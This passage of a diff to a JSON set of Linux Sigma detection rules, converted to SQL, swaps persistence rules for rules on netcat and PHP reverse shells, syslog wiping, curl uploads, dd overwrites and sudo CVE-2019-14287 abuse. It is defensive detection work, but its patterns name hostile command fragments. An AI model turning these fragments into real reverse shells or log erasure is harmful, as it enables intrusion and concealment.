setup.", + "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Admin or User activity are expected to generate some false positives" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/etc/shells' ESCAPE '\\' OR name LIKE '/etc/profile' ESCAPE '\\' OR name LIKE '/etc/profile.d/%' ESCAPE '\\' OR name LIKE '/etc/bash.bashrc' ESCAPE '\\' OR name LIKE '/etc/bashrc' ESCAPE '\\' OR name LIKE '/etc/zsh/zprofile' ESCAPE '\\' OR name LIKE '/etc/zsh/zshrc' ESCAPE '\\' OR name LIKE '/etc/zsh/zlogin' ESCAPE '\\' OR name LIKE '/etc/zsh/zlogout' ESCAPE '\\' OR name LIKE '/etc/csh.cshrc' ESCAPE '\\' OR name LIKE '/etc/csh.login' ESCAPE '\\' OR name LIKE '/root/.bashrc' ESCAPE '\\' OR name LIKE '/root/.bash\\_profile' ESCAPE '\\' OR name LIKE '/root/.profile' ESCAPE '\\' OR name LIKE '/root/.zshrc' ESCAPE '\\' OR name LIKE '/root/.zprofile' ESCAPE '\\' OR name LIKE '/home/%/.bashrc' ESCAPE '\\' OR name LIKE '/home/%/.zshrc' ESCAPE '\\' OR name LIKE '/home/%/.bash\\_profile' ESCAPE '\\' OR name LIKE '/home/%/.zprofile' ESCAPE '\\' OR name LIKE '/home/%/.profile' ESCAPE '\\' OR name LIKE '/home/%/.bash\\_login' ESCAPE '\\' OR name LIKE '/home/%/.bash\\_logout' ESCAPE '\\' OR name LIKE '/home/%/.zlogin' ESCAPE '\\' OR name LIKE '/home/%/.zlogout' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Image LIKE '%/nc' ESCAPE '\\' OR Image LIKE '%/ncat' ESCAPE '\\') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\') AND (CommandLine LIKE '% ash%' ESCAPE '\\' OR CommandLine LIKE '% bash%' ESCAPE '\\' OR CommandLine LIKE '% bsh%' ESCAPE '\\' OR CommandLine LIKE '% csh%' ESCAPE '\\' OR CommandLine LIKE '% ksh%' ESCAPE '\\' OR CommandLine LIKE '% pdksh%' ESCAPE '\\' OR CommandLine LIKE '% sh%' ESCAPE '\\' OR CommandLine LIKE '% tcsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/ash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/bsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/csh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/ksh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/pdksh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/tcsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSash%' ESCAPE '\\' OR CommandLine LIKE '%$IFSbash%' ESCAPE '\\' OR CommandLine LIKE '%$IFSbsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFScsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSksh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSpdksh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFStcsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSzsh%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_unix_shell_configuration_modification.yml" + "filename": "proc_creation_lnx_netcat_reverse_shell.yml" }, { - "title": "Systemd Service Creation", - "id": "1bac86ba-41aa-4f62-9d6b-405eac99b485", - "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", - "author": "Pawel Mazur", + "title": "OMIGOD SCX RunAsProvider ExecuteShellCommand", + "id": "21541900-27a9-4454-9c4c-3f0a4240344a", + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.persistence", - "attack.t1543.002" + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" ], "falsepositives": [ - "Admin work like legit service installs." + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((type = 'PATH' AND nametype = 'CREATE') AND ((name LIKE '/usr/lib/systemd/system/%' ESCAPE '\\' OR name LIKE '/etc/systemd/system/%' ESCAPE '\\') OR name LIKE '%/.config/systemd/user/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (User = 'root' AND LogonId = '0' AND CurrentDirectory = '/var/opt/microsoft/scx/tmp' AND CommandLine LIKE '%/bin/sh%' ESCAPE '\\')" ], - "filename": "lnx_auditd_systemd_service_creation.yml" + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" }, { - "title": "Steganography Extract Files with Steghide", - "id": "a5a827d9-1bbe-4952-9293-c59d897eb41b", - "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "author": "Pawel Mazur", + "title": "Enable BPF Kprobes Tracing", + "id": "7692f583-bd30-4008-8615-75dab3f08a99", + "description": "Detects common command used to enable bpf kprobes tracing", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.003" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'steghide' AND a1 = 'extract' AND a2 = '-sf' AND (a3 LIKE '%.jpg' ESCAPE '\\' OR a3 LIKE '%.png' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CommandLine LIKE '%echo 1 >%' ESCAPE '\\' AND CommandLine LIKE '%/sys/kernel/debug/tracing/events/kprobes/%' ESCAPE '\\' AND (CommandLine LIKE '%/myprobe/enable%' ESCAPE '\\' OR CommandLine LIKE '%/myretprobe/enable%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_steghide_extract_steganography.yml" + "filename": "proc_creation_lnx_bpf_kprob_tracing_enabled.yml" }, { - "title": "Suspicious C2 Activities", - "id": "f7158a64-6204-4d6d-868a-6e6378b467e0", - "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", - "author": "Marie Euler", + "title": "Commands to Clear or Remove the Syslog", + "id": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", + "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", + "author": "Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1070.002" ], "falsepositives": [ - "Admin or User activity" + "Log rotation." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE key LIKE 'susp\\_activity' ESCAPE '\\'" + "SELECT * FROM logs WHERE (CommandLine LIKE '%rm /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -r /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -f /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -rf /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -r /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -f /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -rf /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%mv /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '% >/var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '% > /var/log/syslog%' ESCAPE '\\')" ], - "filename": "lnx_auditd_susp_c2_commands.yml" + "filename": "proc_creation_lnx_clear_syslog.yml" }, { - "title": "Disable System Firewall", - "id": "53059bc0-1472-438b-956a-7508a94a91f0", - "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", - "author": "Pawel Mazur", + "title": "Clipboard Collection with Xclip Tool", + "id": "ec127035-a636-4b9a-8555-0efd4e59f316", + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.t1562.004", - "attack.defense_evasion" + "attack.collection", + "attack.t1115" ], "falsepositives": [ - "Admin activity" + "Legitimate usage of xclip tools." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type LIKE 'SERVICE\\_STOP' ESCAPE '\\' AND unit IN ('firewalld', 'iptables', 'ufw'))" + "SELECT * FROM logs WHERE (Image LIKE '%xclip%' ESCAPE '\\' AND CommandLine LIKE '%-sel%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\')" ], - "filename": "lnx_auditd_disable_system_firewall.yml" + "filename": "proc_creation_lnx_clipboard_collection.yml" }, { - "title": "Creation Of An User Account", - "id": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", - "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", - "author": "Marie Euler, Pawel Mazur", + "title": "Security Software Discovery - Linux", + "id": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", + "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.t1136.001", - "attack.persistence" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ - "Admin activity" + "Legitimate activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((type = 'SYSCALL' AND exe LIKE '%/useradd' ESCAPE '\\') OR type LIKE 'ADD\\_USER' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/grep' ESCAPE '\\' OR Image LIKE '%/egrep' ESCAPE '\\') AND (CommandLine LIKE '%nessusd%' ESCAPE '\\' OR CommandLine LIKE '%td-agent%' ESCAPE '\\' OR CommandLine LIKE '%packetbeat%' ESCAPE '\\' OR CommandLine LIKE '%filebeat%' ESCAPE '\\' OR CommandLine LIKE '%auditbeat%' ESCAPE '\\' OR CommandLine LIKE '%osqueryd%' ESCAPE '\\' OR CommandLine LIKE '%cbagentd%' ESCAPE '\\' OR CommandLine LIKE '%falcond%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_create_account.yml" + "filename": "proc_creation_lnx_security_software_discovery.yml" }, { - "title": "Triple Cross eBPF Rootkit Default Persistence", - "id": "1a2ea919-d11d-4d1e-8535-06cda13be20f", - "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", + "title": "Vim GTFOBin Abuse - Linux", + "id": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea", + "description": "Detects usage of \"vim\" and it's siblings as a GTFOBin to execute and proxy command and binary execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1053.003" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%ebpfbackdoor' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((Image LIKE '%/vim' ESCAPE '\\' OR Image LIKE '%/rvim' ESCAPE '\\' OR Image LIKE '%/vimdiff' ESCAPE '\\') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% --cmd%' ESCAPE '\\') AND (CommandLine LIKE '%:!/%' ESCAPE '\\' OR CommandLine LIKE '%:py %' ESCAPE '\\' OR CommandLine LIKE '%:lua %' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish%' ESCAPE '\\'))" ], - "filename": "file_event_lnx_triple_cross_rootkit_persistence.yml" + "filename": "proc_creation_lnx_gtfobin_vim.yml" }, { - "title": "Linux Doas Conf File Creation", - "id": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", - "description": "Detects the creation of doas.conf file in linux host platform.", - "author": "Sittikorn S, Teoderick Contreras", + "title": "Sudo Privilege Escalation CVE-2019-14287", + "id": "f74107df-b6c6-4e80-bf00-4170b658162b", + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" ], "falsepositives": [ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%/etc/doas.conf' ESCAPE '\\'" + "SELECT * FROM logs WHERE CommandLine LIKE '% -u#%' ESCAPE '\\'" ], - "filename": "file_event_lnx_doas_conf_creation.yml" + "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml" }, { - "title": "Persistence Via Cron Files", - "id": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", - "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "Suspicious Curl Change User Agents - Linux", + "id": "b86d356d-6093-443d-971c-9b07db583c68", + "description": "Detects a suspicious curl process start on linux with set useragent options", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.003" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ - "Any legitimate cron file." + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '/etc/cron.d/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.daily/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.hourly/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.monthly/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.weekly/%' ESCAPE '\\' OR TargetFilename LIKE '/var/spool/cron/crontabs/%' ESCAPE '\\') OR (TargetFilename LIKE '%/etc/cron.allow%' ESCAPE '\\' OR TargetFilename LIKE '%/etc/cron.deny%' ESCAPE '\\' OR TargetFilename LIKE '%/etc/crontab%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/curl' ESCAPE '\\' AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" ], - "filename": "file_event_lnx_persistence_cron_files.yml" + "filename": "proc_creation_lnx_susp_curl_useragent.yml" }, { - "title": "Triple Cross eBPF Rootkit Default LockFile", - "id": "c0239255-822c-4630-b7f1-35362bcb8f44", - "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", + "title": "Atlassian Confluence CVE-2022-26134", + "id": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059", + "cve.2022.26134" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename = '/tmp/rootlog'" + "SELECT * FROM logs WHERE (ParentImage LIKE '/opt/atlassian/confluence/%' ESCAPE '\\' AND ParentImage LIKE '%/java' ESCAPE '\\' AND (CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%dash%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%fish%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%wget%' ESCAPE '\\' OR CommandLine LIKE '%python%' ESCAPE '\\'))" ], - "filename": "file_event_lnx_triple_cross_rootkit_lock_file.yml" + "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" }, { - "title": "Persistence Via Sudoers Files", - "id": "ddb26b76-4447-4807-871f-1b035b2bfa5d", - "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Scheduled Cron Task/Job - Linux", + "id": "6b14bac8-3e3a-4324-8109-42f0546a347f", + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", + "author": "Alejandro Ortuno, oscd.community", "tags": [ + "attack.execution", "attack.persistence", + "attack.privilege_escalation", "attack.t1053.003" ], "falsepositives": [ - "Creation of legitimate files in sudoers.d folder part of administrator work" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '/etc/sudoers.d/%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Image LIKE '%crontab' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\')" ], - "filename": "file_event_lnx_persistence_sudoers_files.yml" - }, - { - "title": "Suspicious Java Children Processes", - "id": "d292e0af-9a18-420c-9525-ec0ac3936892", - "description": "Detects java process spawning suspicious children", + "filename": "proc_creation_lnx_schedule_task_job_cron.yml" + }, + { + "title": "Suspicious Git Clone - Linux", + "id": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.reconnaissance", + "attack.t1593.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ParentImage LIKE '%/java' ESCAPE '\\' AND (CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%dash%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%fish%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%wget%' ESCAPE '\\' OR CommandLine LIKE '%python%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/git' ESCAPE '\\' AND CommandLine LIKE '% clone %' ESCAPE '\\' AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RCE%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_susp_java_children.yml" + "filename": "proc_creation_lnx_susp_git_clone.yml" }, { - "title": "Curl Usage on Linux", - "id": "ea34fb97-e2c4-4afb-810f-785e4459b194", - "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "File and Directory Discovery - Linux", + "id": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", + "description": "Detects usage of system utilities to discover files and directories", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Legitimate activities" ], - "level": "low", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE Image LIKE '%/curl' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((Image LIKE '%/file' ESCAPE '\\' AND CommandLine REGEXP '(.){200,}') OR (Image LIKE '%/ls' ESCAPE '\\' AND CommandLine LIKE '%-R%' ESCAPE '\\') OR Image LIKE '%/find' ESCAPE '\\' OR Image LIKE '%/tree' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_curl_usage.yml" + "filename": "proc_creation_lnx_file_and_directory_discovery.yml" }, { "title": "Triple Cross eBPF Rootkit Execve Hijack", @@ -1224,276 +1301,274 @@ "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" }, { - "title": "Clipboard Collection with Xclip Tool", - "id": "ec127035-a636-4b9a-8555-0efd4e59f316", - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "Potential PHP Reverse Shell", + "id": "c6714a24-d7d5-4283-a36b-3ffd091d5f7e", + "description": "Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\nAttackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.\n", + "author": "@d4ns4n_", "tags": [ - "attack.collection", - "attack.t1115" + "attack.execution" ], "falsepositives": [ - "Legitimate usage of xclip tools." + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%xclip%' ESCAPE '\\' AND CommandLine LIKE '%-sel%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/php%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND CommandLine LIKE '%fsockopen%' ESCAPE '\\' AND (CommandLine LIKE '%ash%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%bsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%pdksh%' ESCAPE '\\' OR CommandLine LIKE '%sh%' ESCAPE '\\' OR CommandLine LIKE '%tcsh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_clipboard_collection.yml" + "filename": "proc_creation_lnx_php_reverse_shell.yml" }, { - "title": "Decode Base64 Encoded Text", - "id": "e2072cab-8c9a-459b-b63c-40ae79e27031", - "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Curl File Upload - Linux", + "id": "00b90cc1-17ec-402c-96ad-3a8117d7a582", + "description": "Detects a suspicious curl process start the adds a file to a web request", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.exfiltration", + "attack.t1567", + "attack.t1105" ], "falsepositives": [ - "Legitimate activities" + "Scripts created by developers and admins" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/base64' ESCAPE '\\' AND CommandLine LIKE '%-d%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/curl' ESCAPE '\\' AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_base64_decode.yml" + "filename": "proc_creation_lnx_susp_curl_fileupload.yml" }, { - "title": "Triple Cross eBPF Rootkit Install Commands", - "id": "22236d75-d5a0-4287-bf06-c93b1770860f", - "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DD File Overwrite", + "id": "2953194b-e33c-4859-b9e8-05948c167447", + "description": "Detects potential overwriting and deletion of a file using DD.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.t1014" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Unlikely" + "Any user deleting files that way." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/sudo' ESCAPE '\\' AND CommandLine LIKE '% tc %' ESCAPE '\\' AND CommandLine LIKE '% enp0s3 %' ESCAPE '\\' AND (CommandLine LIKE '% qdisc %' ESCAPE '\\' OR CommandLine LIKE '% filter %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image IN ('/bin/dd', '/usr/bin/dd') AND CommandLine LIKE '%of=%' ESCAPE '\\' AND (CommandLine LIKE '%if=/dev/zero%' ESCAPE '\\' OR CommandLine LIKE '%if=/dev/null%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml" + "filename": "proc_creation_lnx_dd_file_overwrite.yml" }, { - "title": "System Network Connections Discovery - Linux", - "id": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", - "description": "Detects usage of system utilities to discover system network connections", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Scheduled Task/Job At", + "id": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", + "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", + "author": "Ömer Günal, oscd.community", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.persistence", + "attack.t1053.002" ], "falsepositives": [ - "Legitimate activities" + "Legitimate administration activities" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/who' ESCAPE '\\' OR Image LIKE '%/w' ESCAPE '\\' OR Image LIKE '%/last' ESCAPE '\\' OR Image LIKE '%/lsof' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE '%/usr/bin/landscape-sysinfo%' ESCAPE '\\' AND Image LIKE '%/who' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/at' ESCAPE '\\' OR Image LIKE '%/atd' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_system_network_connections_discovery.yml" + "filename": "proc_creation_lnx_at_command.yml" }, { - "title": "Python Spawning Pretty TTY", - "id": "c4042d54-110d-45dd-a0e1-05c47822c937", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "title": "User Added To Root/Sudoers Group Using Usermod", + "id": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", + "description": "Detects usage of the \"usermod\" binary to add users add users to the root or suoders groups", + "author": "TuanLe (GTSC)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/python2.%' ESCAPE '\\' OR Image LIKE '%/python3.%' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/usermod' ESCAPE '\\' AND (CommandLine LIKE '%-aG root%' ESCAPE '\\' OR CommandLine LIKE '%-aG sudoers%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_python_pty_spawn.yml" + "filename": "proc_creation_lnx_usermod_susp_group.yml" }, { - "title": "Scheduled Task/Job At", - "id": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", - "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", + "title": "File Deletion", + "id": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", + "description": "Detects file 